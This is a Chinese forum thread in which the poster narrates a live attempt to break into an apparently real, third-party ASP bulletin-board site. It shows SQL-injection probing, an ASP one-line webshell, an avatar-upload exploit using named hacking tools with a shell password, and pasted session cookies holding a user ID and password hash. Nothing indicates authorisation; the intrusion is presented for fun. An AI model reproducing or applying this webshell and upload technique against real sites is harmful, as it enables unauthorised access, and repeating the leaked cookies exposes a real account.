csgajcr吧 关注:35贴子:6,297
  • 9回复贴,共1

【直播】帮球球嘿嘿嘿

取消只看楼主收藏回复

RT
估计这个站不难,而且通常情况下这种学校的小网站最好弄了。我们学校的特殊,数据库都坏了也没人修,拿到账号密码了却没有验证码(图裂了),这个吊。。
工具:HUC学生组工具包3.0



IP属地:日本1楼2013-09-07 21:03回复
    通常的,试试有没有注入点。
    随便打开一个主题
    看到浏览器栏的地址
    在最后加一英文单引号'
    然后回车,发现又回到主页,证明没有注入点。我又试了试加上and 1=1 和 and 1=2都不行


    IP属地:日本2楼2013-09-07 21:07
    回复
      既然来了,那就注册个账号呗

      asp的网站,用一句话试试
      <%execute(request("zz123"))%>
      成功上去了,然后用 中国菜刀 链接试试
      结果被墙了


      IP属地:日本5楼2013-09-07 21:49
      回复
        论坛有事,明天继续


        IP属地:日本6楼2013-09-07 22:05
        回复
          买早饭去,回来继续,dxxo建的站,目测是upface那里有上传漏洞


          IP属地:日本8楼2013-09-08 09:33
          回复
            吃饱咯,开工!~


            IP属地:日本9楼2013-09-08 09:52
            回复
              吃饱咯,开工!~
              经过不停的抓包,终于发现了好东西



              IP属地:日本10楼2013-09-08 10:36
              回复
                抓包成功



                IP属地:日本11楼2013-09-08 10:39
                回复
                  准备好上传用的马,我大马小马图片马都准备了一个,密码是hucxsz

                  好了,开始上传
                  先上传一个正常的头像,让我们知道上传的路径在哪里
                  是bbs/uploadface/
                  工具用明小子,综合上传→自定义上传

                  cookies填上刚才抓包得到的cookies:ylinklinkfylogin=cpb; ASPSESSIONIDSCCCTDSD=PIPLDNOBMAIDONDAJHFJHFMG; cpbhidden=0; fylinklinkfeiyue=userid=26&password=16a0c5afc0ad6ec3&username=zz
                  填好之后


                  IP属地:日本12楼2013-09-08 10:57
                  回复
                    @csgajcr 已经上传成功了,找不到文件。。
                    I


                    IP属地:日本15楼2013-09-19 19:27
                    收起回复